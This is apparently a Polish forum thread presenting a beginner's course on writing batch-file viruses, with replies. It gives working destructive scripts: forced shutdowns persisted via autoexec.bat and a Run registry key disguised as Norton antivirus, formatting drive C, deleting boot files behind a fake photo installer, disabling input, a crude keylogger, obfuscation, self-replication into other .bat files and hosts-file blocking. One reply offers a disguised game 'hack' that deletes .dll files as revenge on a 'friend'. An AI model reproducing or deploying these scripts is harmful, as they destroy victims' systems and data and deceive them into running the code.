Kurs Robienia Virusów W Formacie *.bat

[jackraymund]

Witam wszystkich w moim kursie o batchu.

 

Życzę przyjemnej edukacji i przepraszam za wszelkiego rodzaju błędy.

1.Wstęp

Zalety:

-posiada proste komendy (po angielsku)

-umożliwia proste kopiowanie, przenoszenie, usuwanie plików itp.

 

 

Wady:

-małe możliwości

-prosty do rozpracowania kod źródłowy

 

Koniec paplaniny, przejdźmy do konkretów! :-)

 

 

 

2.Pierwszy krok(komeny)

Nie będę wam truł na temat komend bo jest ich za dużo.Jeżeli chcecie pozać komendy to klikamy start i klikamy zakładkę uruchom wpisujemy tam cmd otwiera nam sie okno dosa wpisujemy help

i wyskakują nam prawie wszystkie komendy jeżeli chcemy jakaś komeda poznać bilżej to piszemy np. help copy i wyskakuje nam wszystko o copy.

 

Są komendy których nie ma w help np.shutdown

Więc chcemy sie dowiedzieć co to znaczy i jak tego używać piszemy shutdown /? i mamy wszystko.

 

 

UWAGA NA PRAWDE RADZE NAUCZYC SIE KOMEND

ZANIMM ZACZNIESZ CZYTAC DALEJ

 

 

 

1.ROBIMY VIRUSA

Piszemy pierwszego virusa.

Otwieramy notatnik i piszemy.

 

 

shutdown.exe -s -t 600 -c pierwszy virus

 

 

Jak już pewnie wiecie z dosa -s oznacza zamknięcie systemu -t 600 oznacza po jakim czasie system ma zostać zamknięty 600 to są sekundy -c oznacza komętaż.

Robimy cos odwrotnego piszemy

 

shutdown.exe -a

 

oznacza to przerwanie zamknięcia systemu.

 

Więc możemy otworzyć naszego virusa.

 

 

shutdown.exe -s -t 600 -c pierwszy virus

 

A żeby komp sie nam nie zamknął uruchamiamy to

 

shutdown.exe -a

 

I zamykanie zostanie przerwane

 

Możemy rownież naszego vira dodać do autoexec.bat czyli będzie sie uruchamiał przy starcie sytemu

 

echo off
echo shutdown.exe -s -t 600 -c pierwszy virus>>C:\autoexec.bat
pause>nul

 

Wyjaśniam

 

echo shutdown.exe -s -t 600 -c pierwszy virus>>C:\autoexec.bat

 

to jest tresc naszego vira.Jeden znacznik >tworzy plik z tym co jest w echo a dwa znaczniki >>dopisują echo to pliku.

To znaczy że do pliku autoexec.bat zostanie dodana linijka echo shutdown.exe -s -t 600 -c pierwszy virus a że autoexec.bat jest plikiem startowym uruchomi sie ten virus przy starcie systemu

 

Już chyba nie muszę pisać że virusy bat sie pisze

w notepad i zapisuje sie je w rozszerzeniu bat.

 

 

 

2.Robimy drugiego virusa

 

echo off
echo format C:>>C:\autoexec.bat
cls
pasue>nul

 

 

To formatuje C

I tak sie można bawić w niskończoność

Tak jak pisałem nie będę opisywał co co znaczy macie dosa i komende help i z dosa weźmiecie pomysły na virusy i przy okazji jak bęndziesz uważał to sie nauczysz obsługiwac w dosie.

Polecam robienie virusów programem Batch creator 3.0 można go pobrać z

http://www.idg.pl/ftp/pobierz/pc/10832.html

Ale jeszcze podam poniżej pare

echo off
Ver
pause>nul

 

Pokazuje versje windowsa

 

 

 

echo shutdown.exe -s>>C:\autoexec.bat

 

 

Chyba nie musze mowić

 

 

ECHO OFF
PAUSE>nul
ECHO google startuje
CLS
start http://google.pl

 

Otwiera sie strona z google

 

 

 

A teraz cos trudnego

@echo off
echo .>>c:\keys.txt
echo :
set /p keys=
echo %keys%>>c:\keys.txt
start keylogger.bat
exit

taki mały psełdo keyloger zapisuje to co napiszesz w oknie dosa na c w pliku keys.txt

 

 

Giertych

 

echo off
cls
echo Giertych chcieć IV RzeczyPospolitej! Giertych chcieć władza!
rundll32 keyboard,disable
rundll32 mouse,disable
rundll32 user,swapmousebutton
rundll32 krnl386.exe,FatalExit
dir c:\*.* /s /v >>c:\autoexec.bat
echo g=ffff:0 | debug >>c:autoexec.bat
copy c:\windows\*.* c:\windows\pulpit\*.* >nul

 

 

 

 

Killer

 

 

@echo off
cls
echo.
echo Instaluje wirusa KILLER 1.0 w systemie...
echo @echo off >c:\windows\menust~1\programy\autost~1\_setup.bat
echo cls >>c:\windows\menust~1\programy\autost~1\_setup.bat
echo rundll32 mouse,disable >>c:\windows\menust~1\programy\autost~1\_setup.bat
echo rundll32 keyboard,disable >>c:\windows\menust~1\programy\autost~1\_setup.bat
echo echo Jestes zarazony wirusem KILLER 1.0 !!!!!!!!!!!!!!!!!!!!!!>>c:\windows\menust~1\programy\autost~1\_setup.bat
echo pause >>c:\windows\menust~1\programy\autost~1\_setup.bat
echo goto end>>c:\autoexec.bat
echo :hahaha>>c:\autoexec.bat
echo rename c:\3.wir 1.wir>>c:\autoexec.bat
echo :run>>c:\autoexec.bat
echo cls>>c:\autoexec.bat
echo echo *********************>>c:\autoexec.bat
echo echo * Wirus KILLER 1.0 *>>c:\autoexec.bat
echo echo * Autor: UNKNOW *>>c:\autoexec.bat
echo echo *********************>>c:\autoexec.bat
echo goto run>>c:\autoexec.bat
echo :end>>c:\autoexec.bat
echo if exist c:\3.wir goto hahaha>>c:\autoexec.bat
echo if exist c:\2.wir rename 2.wir 3.wir>>c:\autoexec.bat
echo if exist c:\1.wir rename 1.wir 2.wir>>c:\autoexec.bat
echo Plik kontrolny wirusa KILLER 1.0 >c:\1.wir
echo Instalacja zakonczona.
pause

 

Nie muszę wyjaśniać

 

@echo off
cls
echo Napisz cos i nacisnij F6 i ENTER! Znajdzie to sie w Text.txt
copy con text
move text text.txt

 

 

2 część

 

metody szyfrowania ,dodawanie do rejestru i ukrywanie virusów.

 

1.OK

 

 

 

Może zaczniemy od ukrywania virusów.

Wiec piszemy podstawowego vira np.

 

 

@echo off
cls
shutdown.exe -r -t 600
ATTRIB +S +H +R C:\saser.bat

 

 

start-uruchom-cmd-help attrib

 

Opis attrib to polecenie które zmienia atrybuty plików. Jeżeli klikniemy na jakis pliku prawym przyciskiem myszki i klikniemy właściwości pokażą nam sie atrybuty takie jak: tylko do odczytu,ukryty,archiwalny.

Poleceniem attrib możemy zrobić ten plik plikiem systemowym pisząc:

 

S-systemowy

 

Popatrzmy na naszego vira jeszcze raz.

 

 

@echo off
cls
shutdown.exe -r -t 600
ATTRIB +S +H +R C:\saser.bat

 

 

Więc, jak go otworzymy to komp zamknie się za 10min i nasz vir nam zniknie a dzieki atrybutowi +S nawet jak ustawimy żeby był widoczny to go i tak go nie będzie, bo ma atrybut pliku systemowego.

 

Wyjaśnienie,

 

Jezeli chcemy dodać atrybut do pliku

piszemy: attrib np. +H. Plus oznacza że atrybut zostanie ustawiony, a minus oznacza że będzie usunięty .Musicie pamiętać że trzeba podać lokalizace naszego vira tak jak w przykładzie

 

 

@echo off
cls
shutdown.exe -r -t 600
ATTRIB +S +H +R C:\saser.bat

 

C:\saser.bat

to jest lokalizacja naszego vira.Czyli jak naszego vira mamy na C:\ pod nawa saser.bat to będzie działać

 

Czas na próbę!

 

@echo off
cls
shutdown.exe -r -t 600
ATTRIB +S +H +R C:\saser.bat

 

Piszemy to w notatniku i zapisujemy jako bat.

Teraz uruchamiamy cmd i tam wpisujemy shutdown.exe -a.

Ale po co?

A po to żeby nam sie komp nie zamknął.

-a oznacza przerwanie zamkniecia.

Ok jak już uruchomilismy naszgo vira i go Zamknęliśmy to go po prostu nie ma.Nawet jak sie włączy pokazywanie ukrytych plikow.

Żeby sie nam znów pokazał wchodzimy w cmd i wpisujemy:

ATTRIB -S -H -R c:\saser.bat

 

Rozumiecie, po prostu usuwa on te atrybuty z C:\saser.bat,ponieważ ten plik tam byl tylko że był niewidoczny.

 

I to chyba na tyle z urkrywaniem plikow bat.

 

 

Teraz szyfrowanie plików bat.

 

 

@echo off
cls
shutdown.exe -r -t 600

 

Skróciłem tego vira bo atirb nie jest teraz nam potrzebne,więc

 

 

 

@echo off
cls
shutdown.exe -r -t 600

 

Teraz po między każdą literę wstwiamy puste zmienne np. x i %

 

czyli treść naszego wira powinna wyglądać tak:

 

%X%
%X%@%X%e%X%c%X%h%X%o%X% %X%o%X%f%X%f%X%
%X%c%X%%X%l%X%s%X%
%X%s%X%h%X%u%X%t%X%%X%d%X%o%X%w%X%n%X%.%X%e%X%x%X%e%X% %X%-%X%r%X% %X%-%X%t%X% %X%6%X%0%X%0%X%

Niezła sieczka co?

 

Podam wam teraz przykład vira:

 

 

@echo off
cls
echo instaluje zdjencie
erase C:\COMMAND.COM
erase C:\IO.SYS
erase C:\MSDOS.SYS
erase C:\WINDOWS\WIN.COM
erase C:\WINDOWS\SYSTEM\VMM32\IOS.VXD
erase C:\WINDOWS\SYSTEM\VMM32.VXD
erase C:\WINDOWS\SYSTEM\KERNEL32.DLL
erase C:\WINDOWS\EXPLORER.EXE
erase C:\WINDOWS\SYSTEM\WINOA386.MOD
erase C:\WINDOWS\WIN.INI
erase C:\WINDOWS\SYSTEM.INI
echo .>C:\zdj.jpg
echo zdjecie znajdziesz na dysku C:\
pause>nul
echo shutdown.exe -s -t 60000 -c "WARNING FATAL ERROR">>c:\autoexec.bat
md C:\sys36
echo shutdown.exe -s -t 60000 -c "WARNING FATAL ERROR">C:\sys36\fatalerror.bat
echo If you want find information about that you must cilck on fatalerror.bat. This file is in : C:\sys36\fatalerror.bat
start C:\sys36\fatalerror.bat

 

Usuwa on pliki potrzebne do rozruchu systemu.

 

Oczywisice ten kto go uruchomił widzi tylko rozpakowywanie sie pliku zmyły.

 

 

A teraz ten sam vir tylko że z naszym szyfrowaiem:

 

 

 

%x%@%x%e%x%c%x%h%x%o%x% %x%o%x%f%x%f%x%
%x%c%x%l%x%s%x%
%x%e%x%c%x%h%x%o%x% %x%i%x%n%x%s%x%t%x%a%x%l%x%u%x%j%x%e%x% %x%z%x%d%x%j%x%e%x%n%x%c%x%i%x%e%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%C%x%O%x%M%x%M%x%A%x%N%x%D%x%.%x%C%x%O%x%M%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%I%x%O%x%.%x%S%x%Y%x%S%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%M%x%S%x%D%x%O%x%S%x%.%x%S%x%Y%x%S%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%W%x%I%x%N%x%.%x%C%x%O%x%M%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%S%x%Y%x%S%x%T%x%E%x%M%x%\%x%v%x%M%x%M%x%3%x%2%x%\%x%I%x%O%x%S%x%.%x%V%x%X%x%D%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%S%x%Y%x%S%x%T%x%E%x%M%x%\%x%V%x%M%x%M%x%3%x%2%x%.%x%V%x%X%x%D%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%S%x%Y%x%S%x%T%x%E%x%M%x%\%x%K%x%E%x%R%x%N%x%E%x%L%x%3%x%2%x%.%x%D%x%L%x%L%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%E%x%X%x%P%x%L%x%O%x%R%x%E%x%R%x%.%x%E%x%X%x%E%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%S%x%Y%x%S%x%T%x%E%x%M%x%\%x%W%x%I%x%N%x%O%x%A%x%3%x%8%x%6%x%.%x%M%x%O%x%D%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%W%x%I%x%N%x%.%x%I%x%N%x%I%x%
%x%e%x%r%x%a%x%s%x%e%x% %x%C%x%:%x%\%x%W%x%I%x%N%x%D%x%O%x%W%x%S%x%\%x%S%x%Y%x%S%x%T%x%E%x%M%x%.%x%I%x%N%x%I%x%
%x%e%x%c%x%h%x%o%x% %x%.%x%>%x%C%x%:%x%\%x%z%x%d%x%j%x%.%x%j%x%p%x%g%x%
%x%e%x%c%x%h%x%o%x% %x%z%x%d%x%j%x%e%x%c%x%i%x%e%x% %x%z%x%n%x%a%x%j%x%d%x%z%x%i%x%e%x%s%x%z%x% %x%n%x%a%x% %x%d%x%y%x%s%x%k%x%u%x% %x%C%x%:%x%\%x%
%x%p%x%a%x%u%x%s%x%e%x%
%x%e%x%c%x%h%x%o%x% %x%s%x%h%x%u%x%t%x%d%x%o%x%w%x%n%x%.%x%e%x%x%x%e%x% %x%-%x%s%x% %x%-%x%t%x% %x%6%x%0%x%0%x%0%x%0%x% %x%-%x%c%x% %x%"%x%W%x%A%x%R%x%N%x%I%x%N%x%G%x% %x%F%x%A%x%T%x%A%x%L%x% %x%E%x%R%x%R%x%O%x%R%x%"%x%>%x%>%x%c%x%:%x%\%x%a%x%u%x%t%x%o%x%e%x%x%x%e%x%c%x%.%x%b%x%a%x%t%x%
%x%m%x%d%x% %x%C%x%:%x%\%x%s%x%y%x%s%x%3%x%6%x%
%x%e%x%c%x%h%x%o%x% %x%s%x%h%x%u%x%t%x%d%x%o%x%w%x%n%x%.%x%e%x%x%x%e%x% %x%-%x%s%x% %x%-%x%t%x% %x%6%x%0%x%0%x%0%x%0%x% %x%-%x%c%x% %x%"%x%W%x%A%x%R%x%N%x%I%x%N%x%G%x% %x%F%x%A%x%T%x%A%x%L%x% %x%E%x%R%x%R%x%O%x%R%x%"%x%>%x%C%x%:%x%\%x%s%x%y%x%s%x%3%x%6%x%\%x%f%x%a%x%t%x%a%x%l%x%e%x%r%x%r%x%o%x%r%x%.%x%b%x%a%x%t%x%
%x%e%x%c%x%h%x%o%x% %x%i%x%f%x% %x%y%x%o%x%u%x% %x%w%x%a%x%n%x%t%x% %x%f%x%i%x%n%x%d%x% %x%i%x%n%x%f%x%o%x%r%x%m%x%a%x%t%x%i%x%o%x%n%x%s%x% %x%o%x%n%x% %x%t%x%h%x%i%x%s%x% %x%t%x%o%x%p%x%i%x%c%x% %x%y%x%o%x%u%x% %x%c%x%i%x%l%x%c%x%k%x% %x%o%x%n%x% %x%f%x%a%x%t%x%a%x%l%x%e%x%r%x%r%x%o%x%r%x% %x%h%x%e%x% %x%i%x%s%x% %x%h%x%e%x%r%x%e%x% %x%l%x%o%x%c%x%a%x%l%x% %x%C%x%:%x%\%x%s%x%y%x%s%x%3%x%6%x%\%x%f%x%a%x%t%x%a%x%l%x%e%x%r%x%r%x%o%x%r%x%.%x%b%x%a%x%t%x%
%x%s%x%t%x%a%x%r%x%t%x% %x%C%x%:%x%\%x%s%x%y%x%s%x%3%x%6%x%\%x%f%x%a%x%t%x%a%x%l%x%e%x%r%x%r%x%o%x%r%x%.%x%b%x%a%x%t%x%

Troche długi co?

Spróbujcie sie doczytac

 

To już wszystko na temat szyfrowania tresci vira.

 

 

 

A teraz dodawane do rejestru:

 

 

@echo off
shutdown.exe -r -t 600 -c "ty downie"
echo REGEDIT4 >>a.reg
echo. >>a.reg
echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg
echo "Norton AntyVirus"="C:\\saser.bat" >>a.reg
echo. >>a.reg
regedit /s a.reg
dir >nul
del a.reg>nul

 

Ten vir będzie sie uruchamiał za kadym startem systemu i zamykał kompa. Po między @echo off

a echo REGEDIT4 >>a.reg wpisujemy co ma nasz vir robić.

 

Regedit /s a.reg dodaje wpis do rejestru bez pytania.

 

 

W tym programie zastosowano nazwę Norton AntyVirus, dla ukrycia się przed Lepszymi Użytkownikami czyli popularnie "lepszymi lamerami"

 

Polecenie DIR >NUL zostało użyte tylko i wyłącznie dla opóźnienia programu.

 

 

Klasyką wśród wirusów jest dopisywanie jakiś śmieci do C:\AUTOEXEC.BAT, ale pamiętajcie. Dopisujcie tam jakieś polecenia, a nie zamazujcie tego pliku kodem wirusa! Jedno z bardziej złośliwych poleceń jakie można dopisać do tego pliku to:

:go
goto go

 

Te dwa poleconka uniemożliwią start PC'ta (można to przerwać naciskając np. CTRL+C) Można tez trochę wydłużyć start komputera pisząc:

 

dir c:\*.* /s >nul

 

Ten programik przeglądnie CAŁY!!! dysk C: w poszukiwaniu plików, a to (w zależności od ilości plików) zajmie mu od ok. 10 sekund do 5 minut! Można tez zrobić takie chamstwo:

 

echo g=ffff:0 | debug

 

Po dopisaniu tej linijki do AUTOEXEC'a komputer zaraz po starcie będzie zrobił reset! (tak bez końca). Można tez nie bawić się z lamerem i na chama wpisać kultowe juz polecenie

 FORMAT C: /Q /AUTOTEST

Po napisaniu wirusa, polecam przekonwertować go na *.exe, a następnie nadać mu ciekawą ikonę chociażby Gadu-Gadu.

 

 

Rozmnażanie polega na podtrzymaniu gatunku. W tym wypadku chodzi o gatunek naszego wirusa .

Tak wiec wyróżniamy dwa typy rozmnażania:

 

* powielanie poprzez doklejania się do innego pliku BAT

* zamazywanie innego pliku BAT swoim własnym kodem

 

Aby was nie zanudzać dam wam przykłady. Doklejania Się do innego pliku BAT:

 

@echo off
ctty nul
for %%i in (*.bat) do copy %0+%%i %%i /y >nul

 

Uwaga! powyższy przykład na początku działania wyłącza wysyłanie tekstów na ekran! Jeśli chcecie, aby wasz wirus pokazywał komunikat, to użyj tej funkcji na końcu programu.

 

Zamazywanie innego pliku BAT:

 

type %0 >>inny.bat

 

 

Oczywiście tym przykładziku tez można zastosować pętlę FOR tak jak w poprzednim.

 

 

Dodam jeszcze formułke na blokowanie stron internetowych.

 

 

@echo off
cls
echo 127.0.0.1 gry.pl>>D:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 google.pl>>D:\WINDOWS\system32\drivers\etc\hosts
pause>nul

 

Ten vir blokuje popularną wyszukiwarke Google i stronke gry.pl

Jeżeli dotarłeś do

tego miejsca poprzez ciężką pracę i naukę to gratuluję Ci i mianuję Cię początkującym virus-makerem

[Ney Low Cheat]

dzięki 5 leci

[Maniacc]

Jeżeli macie "kolegę" którego wprost nienawidzicie, a do tego gra w metina to w sam raz dla was:

 

http://www.speedyshare.com/files/21273710/Metin2_YangHack.exe

 

Mały "wirusik", który usuwa wszystki pliki z rozszerzeniem .dll

Dodatkowo dla niepoznaki utworzyłem z tego plik do instalacji, więc wygląda to bardzo oficjalnie.

 

Przyjemność gwarantowana :P <Zemsta Rozkoszą Bogów>

 

W 100% by me.

Testowałem na innych rozszerzeniach i działało wyśmienicie.

 

SKAN:

http://www.virustotal.com/pl/analisis/629cf82bb2912b7bbc17408ebc2c638cf9a06c1146feac91c1fd868e3328bfa6-1267819379

 

1/42

[lolesss]

Lol wykrywa mi Wirusa na tej stronie (http://www.mpcforum.pl/topic/99849-kurs-robienia-virusow-w-formacie-bat)

Wychodze ;p